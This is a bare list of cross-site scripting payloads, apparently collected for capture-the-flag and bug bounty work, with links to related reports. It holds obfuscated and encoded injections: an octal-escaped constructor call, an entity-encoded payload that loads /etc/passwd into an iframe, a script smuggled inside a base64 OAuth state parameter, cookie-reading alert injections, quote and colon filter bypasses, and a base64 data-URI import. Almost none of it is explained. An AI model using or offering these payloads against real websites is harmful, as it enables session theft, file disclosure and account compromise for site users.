https://github.com/memzer0x/CTF-Challenges/tree/6fb8b6ed38ac47fec3c46425e531b433e48980e6/CTF-WEB/xssChallenge\

(()=>{})["\\143\\157\\156\\163\\164\\162\\165\\143\\164\\157\\162"]("\\141\\154\\145\\162\\164()")()

XSS to LFI payload :-

<img src=x onerror="&#0000100&#0000111&#000099&#0000117&#0000109&#0000101&#0000110&#0000116&#000046&#0000119&#0000114&#0000105&#0000116&#0000101&#000040&#000039&#000060&#0000105&#0000102&#0000114&#000097&#0000109&#0000101&#000032&#0000115&#0000114&#000099&#000061&#0000102&#0000105&#0000108&#0000101&#000058&#000047&#000047&#000047&#0000101&#0000116&#000099&#000047&#0000112&#000097&#0000115&#0000115&#0000119&#0000100&#000062&#000060&#000047&#0000105&#0000102&#0000114&#000097&#0000109&#0000101&#000062&#000039&#000041">

<iframe srcdoc="<script>alert('XSS')</script>"></iframe>

"%3e%3cImG%20sRC=X%20OneRRoR=alert(document.cookie)%20"%3c

oauth -

&state=eyJhY3Rpb24iOiJtb2JpbGUiLCJyZWRpcmVjdF90byI6InRlc3RcIj48c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmRvbWFpbik8L3NjcmlwdD4ifQ==

https://████/logout_redirect.do?sysparm_url=//j\\\\javascript%3Aalert(document.domain)

mass inject payload - https://bugbounty.zip/RapidHand.html

https://hackenproof.com/reports/DEE-70

https://hackenproof.com/reports/DEE-68

https://blog.pksecurity.io/2023/10/04/microsoft-office.html

javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie

1. bypass block of single quote '?url=home%26apos;-alert(1)//onclick="location='/home'-alert(1)//'"
2. bypass block of colon :?url=javascript%26colon;alert(1)href="javascript:alert(1)”

</base</sTyle/</scRIpt/</textArea/</noScript/</tiTle/-->＜h1/<h1><image/onerror="import('data:application/javascript;charset=utf-8;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKTtjb25zb2xlLmxvZyhkb2N1bWVudC5kb21haW4pOy8v')//%27"src><script>